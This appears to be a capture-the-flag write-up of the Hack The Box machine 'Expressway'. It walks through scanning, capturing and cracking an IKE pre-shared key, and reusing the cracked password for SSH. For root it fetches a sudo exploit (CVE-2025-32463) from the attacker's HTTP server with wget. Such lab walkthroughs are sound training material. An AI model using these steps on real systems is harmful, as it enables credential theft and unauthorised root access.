🔍 1. Reconnaissance
I started the machine using htb-toolkit in AthenaOS, then started an nmap scan on all ports.
doas nmap expressway.htb -p- --min-rate 4500 --max-rtt-timeout 1500ms -sC -sV -oA enum && xsltproc enum.xml -o enum.htmlIt returns that only ssh is open, which is unusual.
🎯 1.1 UDP Scan
I run a UDP scan(it takes a lot of time) looking for more leads
doas nmap expressway.htb -sU -sV --max-rate 1500m --max-retries 2 -T4 -F --version-intensity 0 -oA enum_udp && xsltproc enum_udp.xml -o enum_udp.htmlThis part is used to make the scan faster
--max-rate 1500m --max-retries 2 -T4 -F --version-intensity 0
The flag
-sUtells nmap to scan for UDP ports as it scans for TCP by default.
So we get back 500/UDP port which is used by isakmp.
Internet Security Association and Key Management Protocol (ISAKMP) is a protocol defined by RFC 2408 for establishing security association (SA) and cryptographic keys in an Internet environment.
🛡️ 2. ISAKMP Enumeration
Looking for tools to enumerate ISAKMP I found ike-scan.
checking the man page of ike-scan we can find some interesting options.
Like the aggressive mode
And pskcrack option
📡 2.1 IKE-Scan
So I started my scan with the following command
doas ike-scan -A -Ppasskey expressway.htb -M
It gives us information about iaksmap used in the machine, but we don’t need these for now let’s start by cracking the hash.
🔓 2.2 Hash Cracking
I used hashcat to crack the hash with rockyou.txt list.
hashcat passkey rockyou.txt --show
as hashcat detected the type of the hash we run the command again with hash type
hashcat -m 5400 passkey rockyou.txt --show
And here’s our password freakingrockstarontheroad.
🚪 3. Initial Access
At first I tried accessing the machine through ike but it didn’t work so I tried spraying the password, since we only had SSH available I tried connecting to ssh using the credentials we have.
ssh ike@expressway.htb
[password]: freakingrockstarontheroadand it worked, giving me the user flag
⬆️ 4. Privilege Escalation
Now I have initial access to the machine, I need to get to the root user I decided to do some manual checking since it’s an easy machine.
⚡ 4.1 Sudo & SUID Binaries
Started by checking which packages can run in sudo.
sudo -l
Sadly we can’t run sudo as this user.
So I tried SUID binaries
find / -perm -4000 2>/dev/null
📧 4.2 Exim4 Exploitation
Exim is a mail transfer agent used on Unix-like operating systems.
exim4 seemed promising, it’s not an app you see everyday, also searching for CVEs some were discovered before
However, turned out I can’t execute the binary so I had to look for another way.
🔎 4.3 CVE Research
After some frusturation, I remembered there’s a step that I overlooked which checking sudo CVEs.
sudo --version
Checking exploitdb I found CVE-2025-32463. So I downloaded the exploit and started a python server in my machine
python -m http.server 8080and in target’s machine
wget http://<VPN_IP>:8080/exploit.sh
Now I have a problem, it’s not related to the challenge but I thought it would be good to share.
The file was saved in DOS format, meaning each line will end with CR+LF instead of LF only as Linux do so I had to change the file type, I used vim on my machine
:set ff fileformat=dos:set ff=unix:set ff will return the value and :set ff=unix will update it.
Now we’re in and we can get the flag
Some information may be outdated